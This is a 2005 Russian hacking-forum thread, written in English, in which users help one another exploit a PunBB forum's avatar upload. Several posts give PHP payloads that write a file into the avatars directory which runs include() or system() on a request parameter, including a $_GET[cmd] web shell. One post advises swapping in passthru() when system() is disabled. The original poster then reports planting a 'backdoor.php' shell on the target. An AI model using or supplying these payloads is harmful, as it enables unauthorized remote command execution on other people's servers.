ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

About punbb video... :)
  #1  
Старый 09.10.2005, 19:15
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию About punbb video... :)

io !!!

http://video.antichat.net/videos/ShAnKaR/xak.rar

I have an error with the picture..

Parse error: parse error, unexpected ')' in /space_3/mrtom/forum/img/avatars/q.php on line 1

My picture :

<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>

Please, somebody to give me an original picture ?

Thank'S
 
Ответить с цитированием

  #2  
Старый 09.10.2005, 23:08
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>
Right code:

<?
$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? include($fuck); ?>" );
fclose( $f );
?>


or


$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? system($fuck); ?>" );
fclose( $f );
?>

- then $fuck parameter specify SHELL COMMAND, not file to include
 
Ответить с цитированием

  #3  
Старый 10.10.2005, 02:48
Аватар для grinay
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/q.php","a+");
fwrite($fopen,$shell);
?>

Make so if you have access in that directory then all will work..
__________________

 
Ответить с цитированием

  #4  
Старый 10.10.2005, 03:01
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

and fclose($fopen);
or fflush($fopen);
 
Ответить с цитированием

  #5  
Старый 10.10.2005, 05:16
Аватар для grinay
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

It is possible to not close all and so will work %)
__________________

 
Ответить с цитированием

  #6  
Старый 10.10.2005, 11:38
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию

Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1

with :

<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/c.php","a+");
fwrite($fopen,$shell);
?>



not other means?
 
Ответить с цитированием

  #7  
Старый 10.10.2005, 13:02
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Цитата:
Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1
system() function created for execute commands, system( "ls -ailrt" ); for example.
this function was disabled for security reasons by admin. try to change system() to passthru().
if there has not works, use only file includin'... you can see it on ShAnKaR's video...

че сказал сам нипонил
 
Ответить с цитированием

  #8  
Старый 10.10.2005, 15:57
Аватар для néM3S!s
néM3S!s
Познающий
Регистрация: 07.09.2005
Сообщений: 31
Провел на форуме:
63022

Репутация: 26
По умолчанию

no good..

BUT !! !! !!!!

I put the code of "backdoor.php" (shellZ) in the picture and it's Good !

Thx KeZ and others
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в форумах PunBB... vvs777 Форумы 1 15.10.2005 09:33
XSS в форумах PunBB и LUX PinkPanther Уязвимости 3 30.03.2005 14:38
can i translate ipb video to polish ? p1c2u Комментарии к видео 4 08.02.2005 10:12
Посмотрел video "Как получить чужие письма на рамблере." А можно ли это проделать... fgt E-Mail 3 26.01.2005 22:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ